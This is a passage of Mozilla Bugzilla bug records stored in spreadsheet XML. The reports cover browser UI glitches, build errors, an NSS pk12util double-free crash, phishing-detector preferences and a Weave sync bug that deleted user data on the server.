(When I use wheel mousescrolling is possible)
Reproducible: Always
Steps to Reproduce:
1.Click slider and Drag this.
Actual Results:  
Page is scrolled.
Expected Results:  
Page is not scrolled.
I think this bug is caused 10/31/2003 checkin by uid502 on SeaMonkyBrowser.</t>
  </si>
  <si>
    <t>FIREFOX-208035</t>
  </si>
  <si>
    <t>Use backspace key for back function in Linux</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686) Gecko/20030430 Galeon/1.3.4 Debian/1.3.4.20030509-1
Build Identifier: 
The most common actions I take in my browser are:
* search with google
* go to location bar type in an address or nickname
* paste in an address by middle-clicking on the window
* click on a link
* go back (especially when doing google searches)
* reload (especially for nicknamed or bookmarked pages)
* copy address and paste into another app
All of these should have keyboard shortcuts. And they do. 
But back and reload are very simple actions that should have single key shortcuts. 
Currently on Unix the shortcuts are awkward to find with the fingers: Alt-Left
and Ctrl-R. 
They should be the same as on Windows: Backspace and F5. If that's not possible
other keys should be found so that only a single easy-to-find-with-the-fingers
key needs to be pressed for these extremely common actions.
Thanks for your work on free software.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>FIREFOX-341302</t>
  </si>
  <si>
    <t>7-zip isn't picking up sub directories on Pacifica</t>
  </si>
  <si>
    <t>The -r arg needs to be added to the call to 7z in makensis.mk due to the default in older versions of 7-zip (e.g. 3.12 on Pacifica) is to not recurse subdirectories.</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-301039</t>
  </si>
  <si>
    <t>Top border threedhighlight one pixel too thick as well the as click-down menu (all errors warnings etc.) not centered.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050716 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050716 Firefox/1.0+ ID:2005071608
Top border threedhighlight one pixel too thick as well the as click-down menus
(all errors warnings messages clear and evaluate) not centered.  The Help
Viewer also suffers from the Top border threedhighlight being one pixel too thick.
Reproducible: Always
Steps to Reproduce:
1. Download latest build (Deer Park)
2. Launch Deer Park
3. Click Tools-&gt; JavaScript Console and or Help-&gt; Help Contents
4. Observe the border above the click-down menus (all errors warnings
messages clear) is one pixel too thick as well as the click-down menus (all
errors warnings messages clear and evaluate) are not centered.  Observe in
the Help Contents that the border above the toolbar menu is one pixel too thick.
Actual Results:  
Observe the border above the click-down menus (all errors warnings
messages clear) is one pixel too thick as well as the click-down menus (all
errors warnings messages clear and evaluate) are not centered.  Observe in
the Help Contents that the border above the toolbar menu is one pixel too thick.
Expected Results:  
All highlight borders BELOW the title bar should MATCH the highlight border
below the title bar in the Firefox (Deer Park) main window as shown in the
attachment.  This also would apply to any extensions that display full windows
that are included in the firefox distribution (DOM Inspector which is fine
BTW).  Only the JavaScript Console and the Help Viewer exhibit this issue.</t>
  </si>
  <si>
    <t>BoxerBoi76</t>
  </si>
  <si>
    <t>MOZILLA_LABS-388360</t>
  </si>
  <si>
    <t>Joey Server - Zero results cannot show pagination footer element and may do extras</t>
  </si>
  <si>
    <t>When results = zero ( in type= mode too ) we may: 
[1] not show the pagination footer informaiton
[2] show some interesting other things such as help information on how to add things to Joey.</t>
  </si>
  <si>
    <t>CALENDAR-130097</t>
  </si>
  <si>
    <t>old files need removed from FTP server</t>
  </si>
  <si>
    <t>If I download the Windows Calendar ZIP archive I haven't a clue what to do with
it.  [In general I'm a bit short on clues]
The GNU and similar standards call for including a file INSTALL with every
download package that would give directions for installing the package.
I recommend Mozilla adopt this practice with all products/components that are
commonly downloaded as an archive for manual installation.
This applies also to such things as the SVG/MATHML version of the browser etc.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-365662</t>
  </si>
  <si>
    <t>Setup new access/credentials for community tinderboxes</t>
  </si>
  <si>
    <t>We have a few tinderboxes that we are hosting for community projects. Historically we've used the same build user login credentials (ssh) etc. for tinderbox for both the Mozilla machines and these community machines. 
However we have started moving these community tinderboxes outside the Mozilla firewall and giving some trusted community members access to the machines to assist with tinderbox management. This trend will likely increase as projects like Thunderbird are transitioned to full community ownership.
We should create a new build user for these community tinderboxes create a new read-only CVS account that can pull from internal CVS and figure out a plan for which services community tinderboxese will need (build staging symbol upload AUS) so that we can allow traffic through the firewall and setup access on the servers themselves.</t>
  </si>
  <si>
    <t>CORE-215228</t>
  </si>
  <si>
    <t>[FIXr]innerHTML appends to  do not work properly</t>
  </si>
  <si>
    <t>testcase coming shortly.</t>
  </si>
  <si>
    <t>Morten</t>
  </si>
  <si>
    <t>THUNDERBIRD-371431</t>
  </si>
  <si>
    <t>Add prefs to control the phishing detector's local checks</t>
  </si>
  <si>
    <t>Currently the thunderbird phishing detector performs two static tests on a url to determine if it's a scam:
1) Does the URL contain an IP address?
2) Is there a mismatch between the domain in the link text and the domain in the actual URL we are looking up?
We should add hidden prefs for fine tuning the local tests when phishing detection is enabled. 
This will make it easier for us to test the effectiveness of using a phishing detection web service when we have a provider as it allows us to turn off both of the local tests. Eventually if the provider information is good enough we might be able to turn both of these prefs off in a point release...</t>
  </si>
  <si>
    <t>BUGZILLA-189947</t>
  </si>
  <si>
    <t>Allow Bugzilla to work with Oracle</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0 T312461 F-5.5SP2-20011022 F-5.0.1-20000221 YComp 5.0.0.0 .NET CLR 1.0.3705)
Build Identifier: 
I searched through all the bugs and didn't find anything that specifically 
addresses Oracle.  Adding Oracle support would be nice as many enterprises are 
standardized on Oracle and it would make Bugzilla more palatable if it could 
use existing infrastructure.
Hopefully this will be easier with the implementation of bug #173130.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>lance.larsh</t>
  </si>
  <si>
    <t>nhajratw</t>
  </si>
  <si>
    <t>FIREFOX-332086</t>
  </si>
  <si>
    <t>Tab options 'open links from other applications in...' should be removed</t>
  </si>
  <si>
    <t>The only safe option to open links from other applications is in a new window.
The most recent window may be in a popup window where the navigation controls are not accessible. The new material may overwrite something the user was looking at with no way for the user to press 'back'. I've also been surprised by what mozilla thinks the most recent window is. When you've got multiple windows open and are switching between them while another application churns in the background which window content you lose to the new content becomes a lottery.
A new tab in the most recent window may be in a popup window where the tab controls are not accessible so that the tab is not visible.
This tab option should be removed from the Options and default to opening in a new window.</t>
  </si>
  <si>
    <t>L.Wood</t>
  </si>
  <si>
    <t>NSS-351767</t>
  </si>
  <si>
    <t>pk12util cmd with -o and -W options crashes if exportfile is a directory</t>
  </si>
  <si>
    <t>I was trying to create a .p12 file from a DBdir containing some certs and 
a private key.  The pk12util program I was using was a debug build built 
with Windows' debug RTL.  
I intended to create the p12 file with the name outdir/outfile.p12 but I 
mistyped the output filename omitting the /outfile.p12 leaving just 
the directory name.  I typed the command like this:
pk12util -n nickname -d DBdir -o outdir -W password -K password
where nickname DBdir and the two passwords were the correct/expected 
values but (again) outdir should have been outdir/outfile.p12.
pk12util output a single line error message then crashed.  
The error message was:
   pk12util: Initialization failed: outdir: Access Denied.
The code crashed in free().  
The stack was:
free(void * 0x00a61e60) line 926 + 11 bytes
PR_Free(void * 0x00a61e60) line 536 + 10 bytes
P12U_ExportPKCS12Object() line 712 + 13 bytes
main(int 0x0000000b char * * 0x00a61cd0) line 957 + 28 bytes
The lines of code where the crash occurred were:
    if (slotPw)
        PR_Free(slotPw-&gt;data)
    if (p12FilePw)
        PR_Free(p12FilePw-&gt;data)   &lt;- crashed here
By trial and error I found that there are two crucial ingredients
to this crash which are:
a) the output filename must be a name that will result in a failure
b) the -W option and its argument must be present on the command line
The -K option and its argument are not required.  Without the -K option 
the user is prompted for the cert DB password before the crash.
The problem is a double-free.
In function P12U_GetP12FilePassword the value p12FilePw-&gt;data is assigned
to a variable named p0 which is then freed.  Then later the value of 
p12FilePw-&gt;data is freed again (at the line shown above) resulting in a
double-free.  
One possible (untested) solution might be this change in P12U_GetP12FilePassword:
    } else { /* Plaintext */
-	p0 = p12FilePw-&gt;data
+	p0 = PORT_Strdup(p12FilePw-&gt;data)
    }</t>
  </si>
  <si>
    <t>CORE-256994</t>
  </si>
  <si>
    <t>Error in intl/src/mac when trying to build Firefox with Apple GCC-3.5-tree-ssa</t>
  </si>
  <si>
    <t>I tryed to compile Firefox AVIARY_BRANCH (both 0.9.3 and recent source) with
Apple's gcc-3.5-tree-ssa in OS X 10.3.5 and it failed at the following file:
http://lxr.mozilla.org/aviarybranch/source/intl/locale/src/mac/nsCollationMacUC.cpp
The message I got: 
---------------8&lt;----------------
nsCollationMacUC.cpp
c++ -o nsCollationMacUC.o -c -DOSTYPE=\Darwin7.5.0\ -DOSARCH=\Darwin\ 
-I../../../../dist/include/xpcom -I../../../../dist/include/string
-I../../../../dist/include/unicharutil -I../../../../dist/include/uconv
-I../../../../dist/include/locale -I../../../../dist/include
-I/Volumes/FW_Jaguar/TEMP/Builds/Firefox/AVIARY_1_0_20040515_BRANCH/mozilla/dist/include/nspr
    -I./.. -I/usr/X11R6/include   -mdynamic-no-pic  -I/usr/X11R6/include
-fno-rtti -fno-exceptions -Wall -Wconversion -Wpointer-arith -Wcast-align
-Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor
-Wno-long-long -fpascal-strings -no-cpp-precomp -fno-common -fshort-wchar
-I/Developer/Headers/FlatCarbon -pipe  -DNDEBUG -DTRIMMED -O2 
-I/usr/X11R6/include -DMOZILLA_CLIENT -include ../../../../mozilla-config.h
-Wp-MD.deps/nsCollationMacUC.pp nsCollationMacUC.cpp
nsCollationMacUC.cpp: In destructor `nsCollationMacUC::~nsCollationMacUC()':
nsCollationMacUC.cpp:64: warning: unused variable 'err'
nsCollationMacUC.cpp: In member function `virtual nsresult
nsCollationMacUC::CompareString(PRInt32 constnsAString&amp; constnsAString&amp;
PRInt32*)':
nsCollationMacUC.cpp:223: error: invalid conversion from `PRInt32*' to `SInt32*'
nsCollationMacUC.cpp:223: error:   initializing argument 7 of `OSStatus
UCCompareText(OpaqueCollatorRef* const UniChar* UniCharCount const UniChar*
UniCharCount Boolean* SInt32*)'
nsCollationMacUC.cpp: In member function `virtual nsresult
nsCollationMacUC::CompareRawSortKey(const PRUint8* PRUint32 const PRUint8*
PRUint32 PRInt32*)':
nsCollationMacUC.cpp:244: error: invalid conversion from `PRInt32*' to `SInt32*'
nsCollationMacUC.cpp:244: error:   initializing argument 6 of `OSStatus
UCCompareCollationKeys(const UCCollationValue* ItemCount const
UCCollationValue* ItemCount Boolean* SInt32*)'
make[6]: *** [nsCollationMacUC.o] Error 1
make[6]: *** Waiting for unfinished jobs....
make[5]: *** [libs] Error 2
make[4]: *** [libs] Error 2
make[3]: *** [libs] Error 2
make[2]: *** [tier_9] Error 2
make[1]: *** [default] Error 2
make: *** [build] Error 2
----------8&lt;------------------------------
I will try it with trunk too but I don't expect a different result. With
gcc-3.3 everything works fine.
CCing the people who last changed the lines in question (and still have matches
in the database :| )</t>
  </si>
  <si>
    <t>CORE-390385</t>
  </si>
  <si>
    <t>Plugins may get instantiated before first reflow</t>
  </si>
  <si>
    <t>Plugins may get instantiated before the first reflow of the object frame.
This bug is for the case where a frame changes from display:none to inline (or whatever) i.e. the one where the frame calls HasNewFrame on the content.
That call should move to DidReflow with a check that it's the first reflow.
Regression from bug 1156</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-350990</t>
  </si>
  <si>
    <t>Redo www.mozilla.org main page as an intermediate step towards complete rewrite</t>
  </si>
  <si>
    <t>I have a work-in-progress going at http://mozilla-org.landfill.bugzilla.org/ for my thoughts on changing www.mozilla.org as an intermediate step towards a complete rewrite.
I will need smaller images to go along with a smaller header bar thing. Right now I'm using tables to do it but I'd rather use CSS.
Thoughts?</t>
  </si>
  <si>
    <t>BUGZILLA-508023</t>
  </si>
  <si>
    <t>Speed up MySQL's bz_alter_column for when we're just adding or removing a DEFAULT</t>
  </si>
  <si>
    <t>It turns out that SET DEFAULT and DROP DEFAULT happen almost immediately but CHANGE COLUMN requires re-writing the whole table. So we should optimize for the case where we're just adding or removing a default--it could make a big difference for large installations that are upgrading.</t>
  </si>
  <si>
    <t>FIREFOX-827156</t>
  </si>
  <si>
    <t>Device Permissions</t>
  </si>
  <si>
    <t>[meta] UI punchlist for getUserMedia blockers</t>
  </si>
  <si>
    <t>Items to resolve that relate to the UI (not necessarily bugs in the UI code) either before FF20 uplift to Aurora or soon thereafter (and uplift to Aurora).
Bug 827146 isn't a blocker for this and needs backend first.</t>
  </si>
  <si>
    <t>BUGZILLA-370926</t>
  </si>
  <si>
    <t>Incorrect mail sent when unsetting requestee on review request</t>
  </si>
  <si>
    <t>STEPS TO REPRODUCE:
1)  Person A requests review on a patch from person B
2)  Person B clears the requestee field of that request (leaving it as review?
    with no requestee).
See also log on bug 370906.
ACTUAL RESULTS: Person B gets review requested mail that says:
  B has asked B for review:
and so forth.  (In this case B would be Boris Zbarsky .)
EXPECTED RESULTS:  Not sure what the mail if any should say but what it says right now just has no bearing on reality...</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-479538</t>
  </si>
  <si>
    <t>Sisyphus - JavaScript tests - patterns maintenance</t>
  </si>
  <si>
    <t>1. Update the patterns used in public and confidential failures to remove TEST_CPUSPEED which has not been useful in categorizing failures. This also affects every line in public-failures.txt universe.data etc which bloats the patch to 820K so I won't attach it here.
2. Update the JavaScript Tests Makefile to include a patterns target to extract patterns from the expanded failure files into the reduced failure files. Also use a separate confidential-universe.data file for reducing confidential failures since the population of machines running the confidential tests is different from the ones running the public tests.
3. Update timed_run.py to check if the process is hung on termination and to throw and OSError in that event.</t>
  </si>
  <si>
    <t>SEAMONKEY-360109</t>
  </si>
  <si>
    <t>make suiterunner help use SeaMonkey theme icons</t>
  </si>
  <si>
    <t>suiterunner help should use the same back/forward/home/print icons as the rest of SeaMonkey we need to leverage our new helpOverlay to do that (at least in Classic).</t>
  </si>
  <si>
    <t>CORE-246193</t>
  </si>
  <si>
    <t>IPV6: doesn't revert to IPv4 if IPv6 connect fails</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040610
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040610
I cannot open  after
disabling IPv6 autoconfig (before doing that it didn't work either as IPv6 was
used for this connection and IPv6 doesn't work here but this also affected lynx).
Reproducible: Always
Steps to Reproduce:
1. From the command line type
  mozilla http://ftp.heanet.ie/pub/mozdev/googlebar/XPI-stable.xpi
Actual Results:  
I get the following message in the terminal:
Error loading URL http://ftp.heanet.ie/pub/mozdev/googlebar/XPI-stable.xpi :
80004005 (NS_ERROR_FAILURE)
and Mozilla doesn't open anything.
Expected Results:  
Mozilla should open the URL.
The above URL can be opened with both lynx and wget (from the same machine).
My kernel is a 2.6.6 and I disabled IPv6 autoconfig by doing:
echo 0 &gt; /proc/sys/net/ipv6/conf/eth0/autoconf</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-12077</t>
  </si>
  <si>
    <t>Bringing up a Javascript alert() from a dialog leads to lockup.</t>
  </si>
  <si>
    <t>Bringing up a xul or html dialog which has a button that when clicked displays
a javascript alert() will lead to a hang when you try doing a window.close() on
the window/dialog that was used to launch the alert (the alert itself dimisses
fine).
To reproduce bring up resource:/res/samples/dexopenchrome.xul click on the
HTML dialog button (no need to select any checkboxes defaults work fine) click
on the Show Alert button at the bottom of the dialog dismiss the alert then
click on the OK button in the html dialog to dimiss it. But it hangs. Closing
the dialog using the Windows close box does work however.
This is a dogfood blocker.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-278350</t>
  </si>
  <si>
    <t>tinderbox's showlog should send cache headers</t>
  </si>
  <si>
    <t>since a build log never changes it would be nice to send an Expires: header far
in the future so that the browser can cache it. probably also a last-modified
header for when the log was created.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-511993</t>
  </si>
  <si>
    <t>ForumUX branch: Run SQL patch on from bug 436106</t>
  </si>
  <si>
    <t>We need a small SQL patch to be run on our ForumUX branch test server.
http://sumo-forumux.stage.mozilla.com/ (SVN under branches/forumux)
See patch in bug 436106 attachment 390050.
Thanks!</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-241043</t>
  </si>
  <si>
    <t>menu on left doesn't display completely</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7b) Gecko/20040316
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7b) Gecko/20040316
There should be a blue background extending to the botom of the page according
to IE.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>boofy_bloke</t>
  </si>
  <si>
    <t>WEBSITES-352493</t>
  </si>
  <si>
    <t>[ar] update Firefox central pages</t>
  </si>
  <si>
    <t>Update Firefox Central pages with current EN reference content on mozilla-world.org domain.</t>
  </si>
  <si>
    <t>SEAMONKEY-122208</t>
  </si>
  <si>
    <t>Personal Toolbar Folder labels overflow the window borders</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:0.9.7+) Gecko/20020124
BuildID:    
I noticed the labels of the Personal Toolbar Folder go above the window borders.
For example consider the item WebMail that may show on the far right on the
window (tipical if you set some new items on the left)
[] WebMail
  ---------
Well right part of the WebMail string will be over the border of the
Mozilla window . In Ascii it's difficult to render this concept :) hope may be
comprensible. In case I can send a gif to display it graphically.
--l.
Reproducible: Always
Steps to Reproduce:
1.Set some new PTF items on Personal Toolbar
2.You will notice that the right visible item goes onto the window border till
to the right limit of the display/monitor</t>
  </si>
  <si>
    <t>l.giustini</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-496879</t>
  </si>
  <si>
    <t>oncommand attribute on scrollbox is fired twice</t>
  </si>
  <si>
    <t>When the oncommand attribute is used on a  the command if fired twice.
(It we inhibit one of the onmousedown/onmouseup event in ChromeInputModule#789 oncommand is fired once)</t>
  </si>
  <si>
    <t>THUNDERBIRD-433470</t>
  </si>
  <si>
    <t>Unnecessary array filling in mailCommands.js deleteAllInFolder</t>
  </si>
  <si>
    <t>Created attachment 320676
The fix
I've not found anything to go with this yet and its been sitting in my tree for a week.
In mailCommands.js/deleteAllInFolder we're going around an iterator filling up an nsISupportsArray then we go round a loop (in the same order) acting on the elements.
I think this is just code left over from when I changed the subFolders function.</t>
  </si>
  <si>
    <t>NSS-223242</t>
  </si>
  <si>
    <t>The SSL session timeout arguments to SSL_ConfigServerSessionIDCache and SSL_ConfigMPServerSIDCache are ignored.</t>
  </si>
  <si>
    <t>This bug was reported by LiuPeng  in the
mozilla.crypto newsgroup.
The SSL session timeout arguments to SSL_ConfigServerSessionIDCache
and SSL_ConfigMPServerSIDCache are stored in cache-&gt;ssl2Timeout and
cache-&gt;ssl3Timeout and then ignored.  The code always uses the
global variables ssl_sid_timeout and ssl3_sid_timeout which have
the constant values 100 and 86400L (24 hours).</t>
  </si>
  <si>
    <t>BUGZILLA-356926</t>
  </si>
  <si>
    <t>contrib/README doesn't reflect reality</t>
  </si>
  <si>
    <t>There's a README in the contrib/ directory that really needs to be updated to describe all the scripts in the directory.</t>
  </si>
  <si>
    <t>CORE-386885</t>
  </si>
  <si>
    <t>Removal of JSAtom.number</t>
  </si>
  <si>
    <t>Created attachment 270946
implementation v1
Currently JSAtom.number is used as a hash source when storing atoms in various hash tables. This is redundant since JSAtom* is stable and can be used for hashing just as well.
The attached patch implements such hashing and removes JSAtom.number. The patch  uses jsid directly as a hash code in jsscope.c so the type bits of the id contributes to the hashing.
The patch also removes flags from various js_AtomizeX methods since all the calls to the methods uses 0 for flags.</t>
  </si>
  <si>
    <t>CORE-227914</t>
  </si>
  <si>
    <t>Warpsans bold fonts are not printed bold.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6b) Gecko/20031114 Firebird/0.7+
Build Identifier: Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.6b) Gecko/20031111
 The warpsans bold fonts in the testcase are not printed bold on OS/2.
Reproducible: Always
Steps to Reproduce:
1. Load the testcase and print it.
2.  
3.
Actual Results:  
The bold fonts are not printed bold.
Expected Results:  
It should have printed bold.</t>
  </si>
  <si>
    <t>grajaman</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-433925</t>
  </si>
  <si>
    <t>Better error reporting and handling</t>
  </si>
  <si>
    <t>Currently errors will cause the status bar to say 'error'.  For more details the only place to go is the sync log either the brief or verbose and try to glean the cause of the error from that.
This could be greatly improved.  Is it a network condition?  Data corruption?  A client-side problem?  Is it transient or permanent?  And perhaps most importantly what are the suggested steps for fixing the problem?</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-279809</t>
  </si>
  <si>
    <t>aetna.com - The browser you are currently using does not meet our 128-bit encryption requirement.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
I started using Firefox 1.0 during 11/2004 and was able to login to my
information  until last week (2005-01-18) when I received the following msg:
Software and Security Requirements
We're sorry.  The browser you are currently using does not meet our 128-bit
encryption requirement.
To access Aetna Navigatorâ„¢ your browser must use 128-bit encryption.  Should
you need to upgrade your browser the link to Netscape provided below is for
your use in downloading a 128-bit encryption upgrade.  Aetna is not responsible
for and does not endorse the content and browser update process provided by this
website.
What is Encryption?
    Encryption scrambles data into unintelligible characters based on a secret
key.  Encryption increases the level of security for the information you send
from your browser over the Internet to the Aetna Navigator site.  Most browsers
support a minimum level of 40-bit encryption as well as a stronger 128-bit
encryption level.
    The Aetna Navigator site only supports 128-bit web browser encryption.  Even
though we use the more secure 128-bit encryption there is a certain amount of
risk involved in any Internet communication and Aetna cannot guarantee the
privacy and confidentiality of information exchanged in this manner.
    Understanding this if you would prefer to contact us by phone you can call
Member Services at the number on your ID card.  If you do not have an ID card
yet please contact your employer/group benefits office to obtain the toll-free
number.
How can you upgrade your browser to 128-bit encryption?
    The link to Netscape provided below can be used to download a 128-bit
encryption upgrade.
    Netscape Communicator link:
    http://home.netscape.com/download Please note:  For Netscape users Aetna
Navigator is best viewed using Netscape Version 4.75 - 4.77.  Use of Netscape
Version 6.0 is not recommended as it may result in the inability to access and
view some of the features and functions offered on Aetna Navigator e.g. access
problems with registration inability to access electronic explanation of
benefits statement.
Are there any other technical requirements for using Aetna Navigator?
        * Your browser must be configured to enable cookies (this is the default
setting for version 4.0 or higher browsers).  If you would like additional
information on how we use cookies please refer to our privacy statement.
        * Your browser must be configured to enable JavaScript (this is the
default setting for version 4.0 or higher browsers).
        * Your screen resolution should be set to 800 x 600 pixels (this is
optional but recommended).
If you require technical assistance please call 1-800-225-3375
Monday through Friday 7:00 a.m. to 9:00 p.m. Eastern Time.
I called customer support and tried to explain that Firefox dous support 128 bit
encryption. I can log into my bank stock broker credit cards and other secure
web sites. The person I was talking with seemed to think I am lying.
I left a msg for the superviser - no call back yet.
Also posted a msg at www.aetna.com - the page has been removed.
 I suggested that Aetna contact Mozilla.org about this encrytion issue.
Reproducible: Always
Steps to Reproduce:
1.visit web site
2.
3.
Actual Results:  
Software and Security Requirements
We're sorry.  The browser you are currently using does not meet our 128-bit
encryption requirement. 
Expected Results:  
I should have received a login page</t>
  </si>
  <si>
    <t>mikealte</t>
  </si>
  <si>
    <t>CORE-15300</t>
  </si>
  <si>
    <t>NS_NewThread() only creates threads w/ runnables.</t>
  </si>
  <si>
    <t>I have a fix waiting for review and open tree.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-202729</t>
  </si>
  <si>
    <t>Can't make Enabled checkbox on/off if the filter name is in non-ASCII (e.g Japanese or with German umlauts)</t>
  </si>
  <si>
    <t>Can't make Enabled checkbox on/off if the filter name is in Japanese.
Build: 2003041808-trunk/Linux 2003041609-trunk/WinMe</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-396594</t>
  </si>
  <si>
    <t>Pre-sync for stage migration</t>
  </si>
  <si>
    <t>For the merge of ftp.m.o and archive.m.o we need to have the majority of files transferred over before we start the outage. I'm tracking this dir by dir at the wiki page in the URL field.</t>
  </si>
  <si>
    <t>CORE-457800</t>
  </si>
  <si>
    <t>Implement placeholder attribute for text input fields</t>
  </si>
  <si>
    <t>We should implement the placeholder attribute for text input fields. Safari has already implemented it and WHATWG intends to adopt it as part of Web Forms.
The HTML looks like this:  
The desired behavior is for the placeholder text to appear in the field with a gray color when the field is not focused and the value is empty.
See my post at the attached URL for reasons why this is a good idea and lots of examples of sites reinventing the wheel poorly.</t>
  </si>
  <si>
    <t>mozilla7</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-925092</t>
  </si>
  <si>
    <t>Compatibility Tools</t>
  </si>
  <si>
    <t>Show compatibility error if an add-on references findbar.xml</t>
  </si>
  <si>
    <t>As explained in bug 776708 there are a number of significant changes in the findbar binding so all add-ons that extend or use this binding are potentially affected. We need to flag all instances of this file being used and show an error. Note that the most common location of this reference will be in CSS files.
This is a compatibility error so the add-on should not be upgraded in this case.
Message:
The findbar binding was significantly changed and could break any of its consumers. See  for more information.
Link: https://bugzilla.mozilla.org/show_bug.cgi?id=776708
Affected add-on:
https://addons.mozilla.org/firefox/addon/smart-find/</t>
  </si>
  <si>
    <t>jorge</t>
  </si>
  <si>
    <t>CALENDAR-512436</t>
  </si>
  <si>
    <t>Unconditional removal of 'disabled' state in function changeContextMenuForTask</t>
  </si>
  <si>
    <t>Follow-up from bug 411849:
Investigate unconditional removal of 'disabled' state in function changeContextMenuForTask(aEvent) in calendar/base/content/calendar-task-tree.js:
111     document.getElementById(calendar_new_todo_command).removeAttribute(disabled)
112     document.getElementById(calendar_new_todo_todaypane_command).removeAttribute(disabled)</t>
  </si>
  <si>
    <t>TESTING-414532</t>
  </si>
  <si>
    <t>Mochitest broken on Cygwin</t>
  </si>
  <si>
    <t>There is problem in the sub winPathFromDir file testing\mochitest\runtests.pl.in. The path could not be parsed from some reason. I can simply fix the problem with returning the input parameter directly w/o any change (return $path). That is probably not the correct fix.
I will analyze it deeper and propose the correct patch ASAP.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-492248</t>
  </si>
  <si>
    <t>Weave 0.3.2 deleted all my data</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1b4pre) Gecko/20090401 Ubuntu/9.04 (jaunty) Shiretoko/3.5b4pre
Build Identifier: 0.3.2
On a fresh Firefox install I installed weave 0.3.0.  I didn't get any bookmarks or passwords so I upgrade to 0.3.2 since that is the version installed on my other computers.  Still no bookmarks.  When I look at the log I see that Weave deleted all the data on the server.
Reproducible: Always
Log file:
2009-05-10 11:51:24	Service.Main         INFO	Logs reinitialized for service reset
2009-05-10 11:51:24	Service.Main         DEBUG	Event: weave:service:reset-service:finish
2009-05-10 11:51:24	Engine.Clients       DEBUG	Event: weave:engine:reset-client:start
2009-05-10 11:51:24	Engine.Clients       DEBUG	Resetting clients last sync time
2009-05-10 11:51:24	Store.Clients.Store  DEBUG	Loading json from disk: weave/meta/clients.json
2009-05-10 11:51:24	Store.Clients.Store  DEBUG	Setting client 5d629a1d-1025-4a65-9a53-6b11b3841231: {name:kohjinshatype:laptop}
2009-05-10 11:51:24	Store.Clients.Store  DEBUG	Saving json to disk: weave/meta/clients.json
2009-05-10 11:51:24	Store.Clients.Store  DEBUG	Wiping local clients store
2009-05-10 11:51:24	Store.Clients.Store  DEBUG	Saving json to disk: weave/meta/clients.json
2009-05-10 11:51:24	Engine.Clients       DEBUG	Event: weave:engine:reset-client:finish
2009-05-10 11:51:24	Service.Main         DEBUG	Event: weave:service:reset-client:finish
2009-05-10 11:51:24	Service.Main         INFO	Reset client data from freshStart.
2009-05-10 11:51:24	Service.Main         INFO	Client metadata wiped deleting server data
2009-05-10 11:51:25	Service.Main         DEBUG	Event: weave:service:wipe-server:start
2009-05-10 11:51:26	Net.Resource         DEBUG	GET request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/
2009-05-10 11:51:26	Net.Resource         DEBUG	GET request successful (200)
2009-05-10 11:51:27	Net.Resource         DEBUG	DELETE request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/bookmarks
2009-05-10 11:51:27	Net.Resource         DEBUG	DELETE request successful (200)
2009-05-10 11:51:27	Net.Resource         DEBUG	DELETE request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/clients
2009-05-10 11:51:27	Net.Resource         DEBUG	DELETE request successful (200)
2009-05-10 11:51:28	Net.Resource         DEBUG	DELETE request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/crypto
2009-05-10 11:51:28	Net.Resource         DEBUG	DELETE request successful (200)
2009-05-10 11:51:29	Net.Resource         DEBUG	DELETE request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/keys
2009-05-10 11:51:29	Net.Resource         DEBUG	DELETE request successful (200)
2009-05-10 11:51:30	Net.Resource         DEBUG	DELETE request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/meta
2009-05-10 11:51:30	Net.Resource         DEBUG	DELETE request successful (200)
2009-05-10 11:51:31	Net.Resource         DEBUG	DELETE request for https://sj-weave01.services.mozilla.com/0.3/user/henrik/passwords
2009-05-10 11:51:31	Net.Resource         DEBUG	DELETE request successful (200)
